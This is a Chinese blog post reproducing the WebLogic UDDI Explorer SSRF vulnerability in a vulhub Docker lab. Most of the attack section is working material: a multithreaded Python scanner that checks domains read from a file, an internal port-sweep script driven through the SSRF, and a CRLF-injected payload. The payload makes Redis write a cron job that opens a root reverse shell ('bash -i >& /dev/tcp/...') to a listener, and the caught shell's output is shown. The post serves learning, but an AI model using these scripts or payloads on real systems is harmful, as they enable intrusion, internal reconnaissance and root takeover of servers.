<!DOCTYPE html>
<html lang=zh>
<head><meta name="generator" content="Hexo 3.8.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="前言今天复现weblogic中的ssrf漏洞，以前也没学过ssrf，所以趁着这个机会再把ssrf学习一下。 ssrf介绍SSRF(Server-Side Request Forgery，服务器端请求伪造)是一种由攻击者构造请求，由服务端发起请求的安全漏洞。一般情况下，SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的，所以服务端能请求到与自身相连而与外网隔离的内部系统)。 嗯，">
<meta name="keywords" content="漏洞复现">
<meta property="og:type" content="article">
<meta property="og:title" content="Weblogic复现之ssrf">
<meta property="og:url" content="http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/index.html">
<meta property="og:site_name" content="忆时光">
<meta property="og:description" content="前言今天复现weblogic中的ssrf漏洞，以前也没学过ssrf，所以趁着这个机会再把ssrf学习一下。 ssrf介绍SSRF(Server-Side Request Forgery，服务器端请求伪造)是一种由攻击者构造请求，由服务端发起请求的安全漏洞。一般情况下，SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的，所以服务端能请求到与自身相连而与外网隔离的内部系统)。 嗯，">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/1.png">
<meta property="og:updated_time" content="2019-08-19T07:39:18.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Weblogic复现之ssrf">
<meta name="twitter:description" content="前言今天复现weblogic中的ssrf漏洞，以前也没学过ssrf，所以趁着这个机会再把ssrf学习一下。 ssrf介绍SSRF(Server-Side Request Forgery，服务器端请求伪造)是一种由攻击者构造请求，由服务端发起请求的安全漏洞。一般情况下，SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的，所以服务端能请求到与自身相连而与外网隔离的内部系统)。 嗯，">
<meta name="twitter:image" content="http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/1.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>Weblogic复现之ssrf</title>
    <!-- styles -->
    <link rel="stylesheet" href="/css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="/css/rtl.css">
    
    <!-- rss -->
    
    
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Inici</a></li>
         
          <li><a href="/about/">Qui som</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/projects_url">Projectes</a></li>
        
      </ul>
    </span>
    <br>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2019/07/26/weblogic-fu-xian-zhi-xml-decoder-fan-xu-lie-hua/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2019/07/24/weblogic-fu-xian-zhi-ren-yi-wen-jian-shang-chuan/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Post Anterior</span>
      <span id="i-next" class="info" style="display:none;">Post Següent</span>
      <span id="i-top" class="info" style="display:none;">Adalt</span>
      <span id="i-share" class="info" style="display:none;">Compartir Post</span>
    </span>
    <br>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/&text=Weblogic复现之ssrf"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/&title=Weblogic复现之ssrf"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/&is_video=false&description=Weblogic复现之ssrf"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Weblogic复现之ssrf&body=Check out this article: http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/&title=Weblogic复现之ssrf"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/&title=Weblogic复现之ssrf"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/&title=Weblogic复现之ssrf"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/&title=Weblogic复现之ssrf"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/&name=Weblogic复现之ssrf&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/&t=Weblogic复现之ssrf"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ssrf"><span class="toc-number">2.</span> <span class="toc-text">ssrf</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#介绍"><span class="toc-number">2.1.</span> <span class="toc-text">介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞原理"><span class="toc-number">2.2.</span> <span class="toc-text">漏洞原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ssrf漏洞利用"><span class="toc-number">2.3.</span> <span class="toc-text">ssrf漏洞利用</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#weblogic之ssrf"><span class="toc-number">3.</span> <span class="toc-text">weblogic之ssrf</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#环境搭建"><span class="toc-number">3.1.</span> <span class="toc-text">环境搭建</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#复现攻击"><span class="toc-number">3.2.</span> <span class="toc-text">复现攻击</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope="" itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Weblogic复现之ssrf
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
        <span itemprop="name">ca5tle</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2019-07-25T09:45:41.000Z" itemprop="datePublished">2019-07-25</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/漏洞复现/">漏洞复现</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/漏洞复现/">漏洞复现</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>今天复现weblogic中的ssrf漏洞，以前也没学过ssrf，所以趁着这个机会再把ssrf学习一下。</p>
<h1 id="ssrf"><a href="#ssrf" class="headerlink" title="ssrf"></a>ssrf</h1><h2 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h2><p>SSRF(Server-Side Request Forgery，服务器端请求伪造)是一种由攻击者构造请求，由服务端发起请求的安全漏洞。一般情况下，SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的，所以服务端能请求到与自身相连而与外网隔离的内部系统)。</p>
<p>嗯，上面都是书上写的，我还不太理解。。。。。。。。</p>
<h2 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h2><p>SSRF的形成大多是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。</p>
<p>SSRF利用存在缺陷的Web应用作为代理攻击远程和本地的服务器。</p>
<p>主要攻击方式如下：</p>
<ul>
<li>对外网、服务器所在内网、本地进行端口扫描，获取一些服务的banner信息</li>
<li>攻击运行在内网或本地的应用程序</li>
<li>对内网web应用进行指纹识别，识别企业内部的资产信息</li>
<li>攻击内外网的web应用，主要是使用HTTP GET请求就可以实现的攻击(比如struts2，SQli等)</li>
<li>利用file协议读取本地文件等</li>
</ul>
<h2 id="ssrf漏洞利用"><a href="#ssrf漏洞利用" class="headerlink" title="ssrf漏洞利用"></a>ssrf漏洞利用</h2><h1 id="weblogic之ssrf"><a href="#weblogic之ssrf" class="headerlink" title="weblogic之ssrf"></a>weblogic之ssrf</h1><h2 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h2><ul>
<li><p>涉及版本</p>
<pre><code> 10.0.2
 10.3.6
</code></pre></li>
<li><p>环境部署</p>
<p>进入ssrf环境</p>
<p> <code>cd vulhub/weblogic/ssrf</code></p>
<p>环境构建</p>
<p><code>sudo docker-compose build</code></p>
<p>启动环境</p>
<p><code>sudo docker-compose up -d</code></p>
</li>
<li><p>靶机配置</p>
<p>靶机IP： 192.168.220.141<br>端口：   7001<br>漏洞地址： <a href="http://192.168.220.141:7001/uddiexplorer/SearchPublicRegistries.jsp" target="_blank" rel="noopener">http://192.168.220.141:7001/uddiexplorer/SearchPublicRegistries.jsp</a></p>
</li>
</ul>
<h2 id="复现攻击"><a href="#复现攻击" class="headerlink" title="复现攻击"></a>复现攻击</h2><ol>
<li><p>漏洞检测</p>
<p>检测脚本：</p>
<pre><code>#!/usr/bin/env python  
# -*- coding: utf-8 -*-
import re
import sys
import Queue
import requests
import threading
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
queue = Queue.Queue()
mutex = threading.Lock()
class Test(threading.Thread):
 def __init__(self, queue):
     threading.Thread.__init__(self)
     self.queue = queue
 def check(self,domain,ip):
     payload = &quot;uddiexplorer/SearchPublicRegistries.jsp?operator={ip}&amp;rdoSearch=name&amp;txtSearchname=sdf&amp;txtSearchkey=&amp;txtSearchfor=&amp;selfor=Business+location&amp;btnSubmit=Search&quot;.format(ip=ip)
     url = domain + payload
     try:
         html = requests.get(url=url, timeout=15, verify=False).content
         m = re.search(&#39;weblogic.uddi.client.structures.exception.XML_SoapException&#39;,html)
         if m:
             mutex.acquire()
             with open(&#39;ssrf1.txt&#39;,&#39;a+&#39;) as f:
                 print &quot;%s has weblogic ssrf.&quot; % domain
                 f.write(&quot;%s has weblogic ssrf.&quot; % domain)
             mutex.release()
     except Exception,e:
         print e
 def get_registry(self,domain):
     payload = &#39;uddiexplorer/SetupUDDIExplorer.jsp&#39;
     url = domain + payload
     try:
         html = requests.get(url=url, timeout=15, verify=False).content
         m = re.search(&#39;&lt;i&gt;For example: (.*?)/uddi/uddilistener.*?&lt;/i&gt;&#39;,html)
         if m:
             return m.group(1)
     except Exception,e:
         print e
 def run(self):
     while not self.queue.empty():
         domain = self.queue.get()
         mutex.acquire()
         print domain
         mutex.release()
         ip = self.get_registry(domain)
         self.check(domain,ip)
         self.queue.task_done()
if __name__ == &#39;__main__&#39;:
 with open(&#39;domain.txt&#39;,&#39;r&#39;) as f:
     lines = f.readlines()
 for line in lines:
     queue.put(line.strip())
 for x in xrange(1,50):
     t = Test(queue)
     t.setDaemon(True)
     t.start()
 queue.join()
</code></pre><p>检测结果：</p>
<pre><code>root@kali:~/桌面# python check_weblogic_ssrf.py 
http://192.168.220.141:7001/
http://192.168.220.141:7001/ has weblogic ssrf.
</code></pre></li>
<li><p>手工进行简单检测，在漏洞地址处，点击Search按钮，返回：“An error has occurred”，可从漏洞页面下的“Setup UDDI Explorer”处发现内网地址：</p>
<p><img src="/2019/07/25/weblogic-fu-xian-zhi-ssrf/1.png" alt=""></p>
<p>据说实际环境中该处可能会暴露内网地址<br>我们可以根据返回的不同状态信息，来判断内网的IP是否存在以及对应端口是否开放。</p>
<pre><code>内网网段：
10.0.0.0 ~ 10.255.255.255，
172.16.0.0 ~ 172.31.255.255 
192.168.0.0 ~ 192.168.255.255
</code></pre><p>这里有一个地方需要注意的是，需要知道目标内网网段。如果盲目的去进行网段扫描会耗费大量的时间。<br>一个简单的内网服务嗅探:</p>
<pre><code>import thread
import time
import re
import requests
def ite_ip(ip):
 for i in range(1, 256):
     final_ip = &#39;{ip}.{i}&#39;.format(ip=ip, i=i)
     print final_ip
     thread.start_new_thread(scan, (final_ip,))
     time.sleep(2)
def scan(final_ip):
 ports = (&#39;21&#39;, &#39;22&#39;, &#39;23&#39;, &#39;53&#39;, &#39;80&#39;, &#39;135&#39;, &#39;139&#39;, &#39;443&#39;, &#39;445&#39;, &#39;1080&#39;, &#39;1433&#39;, &#39;1521&#39;, &#39;3306&#39;, &#39;3389&#39;, &#39;4899&#39;, &#39;8080&#39;, &#39;7001&#39;, &#39;8000&#39;,&#39;6389&#39;,&#39;6379&#39;)
 for port in ports:
     vul_url = &#39;http://172.20.10.13:7001/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&amp;rdoSearch=name&amp;txtSearchname=sdf&amp;txtSearchkey=&amp;txtSearchfor=&amp;selfor=Business+location&amp;btnSubmit=Search&#39; % (final_ip,port)
     try:
         #print vul_url
         r = requests.get(vul_url, timeout=15, verify=False)
         result1 = re.findall(&#39;weblogic.uddi.client.structures.exception.XML_SoapException&#39;,r.content)
         result2 = re.findall(&#39;but could not connect&#39;, r.content)
         result3 = re.findall(&#39;No route to host&#39;, r.content)  
         if len(result1) != 0 and len(result2) == 0 and len(result3) == 0:
             print &#39;[!]&#39;+final_ip + &#39;:&#39; + port
     except Exception, e:
         pass
if __name__ == &#39;__main__&#39;:
 ip = &quot;172.21.0&quot;  
 if ip:
     print ip
     ite_ip(ip)
 else:
     print &quot;no ip&quot;
</code></pre><p>结果：</p>
<pre><code>root@kali:~/桌面# python ip_detect.py 
172.20.0
172.20.0.1
[!]172.20.0.1:7001
172.20.0.2
[!]172.20.0.2:6379
172.20.0.3
[!]172.20.0.3:7001
172.20.0.4
172.20.0.5
</code></pre><p>这里我们检测出了一个Redis服务(6379)</p>
</li>
<li><p>利用Redis反弹shell</p>
<p>在前面的探测，我们已经知道了目标系统内网地址存活状态，并发现了一个6379端口主机，根据经验，该端口下的服务是Redis数据库。</p>
<p>下面我们尝试“利用注入HTTP头，来让Redis反弹shell”：</p>
<ul>
<li>Weblogic的SSRF，在使用GET请求时，可以通过“%0a%0d”（\r\n，换行符），来注入换行符。</li>
<li>某些服务（如Redis）是通过换行符来分隔每条命令</li>
<li>因此可以通过该SSRF攻击内网中的Redis服务器</li>
</ul>
<p>① 发送三条Redis命令，将反弹shell脚本写入<code>/etc/crontab</code>:</p>
<pre><code>set 1 &quot;\n\n\n\n* * * * * root bash -i &gt;&amp; /dev/tcp/172.18.0.1/7089 0&gt;&amp;1\n\n\n\n&quot;
config set dir /etc/
config set dbfilename crontab
save
##/etc/crontab 这个文件负责安排由系统管理员制定的维护系统以及其他任务的crontab
##/etc/cron.d/* 将任意文件写到该目录下，效果和crontab相同，格式也要和/etc/crontab相同。漏洞利用这个目录，可以做到不覆盖任何其他文件的情况进行弹shell。
</code></pre><p>将命令写成：</p>
<pre><code>set 1 &quot;\n\n\n\n* * * * root bash -i &gt;&amp; /dev/tcp/xx.xx.xx.xx[这里是你自己的公网IP]/8888[这里是你监听的端口] 0&gt;&amp;1\n\n\n\n&quot; config set dir /etc/config set dbfilename crontab save
</code></pre><p>② 因为是GET，进行url编码，同时我们还要制定一个要写入的文件test，换行为%0A%0D</p>
<p>payload：</p>
<pre><code>/uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.20.0.2:6379/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.220.133%2F7089%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa&amp;rdoSearch=name&amp;txtSearchname=&amp;txtSearchkey=&amp;txtSearchfor=&amp;selfor=Business+location&amp;btnSubmit=Search
</code></pre><p>③ 在192.168.220.133主机上监听端口8888</p>
<pre><code>root@kali:~# nc -l -p 8888
bash: no job control in this shell
[root@76807fba28bc ~]# whoami
whoami
root
[root@76807fba28bc ~]# 
</code></pre><p>反弹shell成功！！！</p>
</li>
</ol>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Inici</a></li>
         
          <li><a href="/about/">Qui som</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/projects_url">Projectes</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ssrf"><span class="toc-number">2.</span> <span class="toc-text">ssrf</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#介绍"><span class="toc-number">2.1.</span> <span class="toc-text">介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#漏洞原理"><span class="toc-number">2.2.</span> <span class="toc-text">漏洞原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ssrf漏洞利用"><span class="toc-number">2.3.</span> <span class="toc-text">ssrf漏洞利用</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#weblogic之ssrf"><span class="toc-number">3.</span> <span class="toc-text">weblogic之ssrf</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#环境搭建"><span class="toc-number">3.1.</span> <span class="toc-text">环境搭建</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#复现攻击"><span class="toc-number">3.2.</span> <span class="toc-text">复现攻击</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/&text=Weblogic复现之ssrf"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/&title=Weblogic复现之ssrf"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/&is_video=false&description=Weblogic复现之ssrf"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Weblogic复现之ssrf&body=Check out this article: http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/&title=Weblogic复现之ssrf"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/&title=Weblogic复现之ssrf"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/&title=Weblogic复现之ssrf"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/&title=Weblogic复现之ssrf"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/&name=Weblogic复现之ssrf&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://imysec.github.io/2019/07/25/weblogic-fu-xian-zhi-ssrf/&t=Weblogic复现之ssrf"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menú</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Compartir</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Cap amunt</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2018-2020
    忆时光
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Inici</a></li>
         
          <li><a href="/about/">Qui som</a></li>
         
          <li><a href="/archives/">Articles</a></li>
         
          <li><a href="/projects_url">Projectes</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">

    <!-- jquery -->
<script src="/lib/jquery/jquery.min.js"></script>
<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>
<!-- clipboard -->

  <script src="/lib/clipboard/clipboard.min.js"></script>
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"In die Zwischenablage kopiert!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Kopiert!");
      e.clearSelection();
    })
  })
  </script>

<script src="/js/main.js"></script>
<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Disqus Comments -->


</body>
</html>
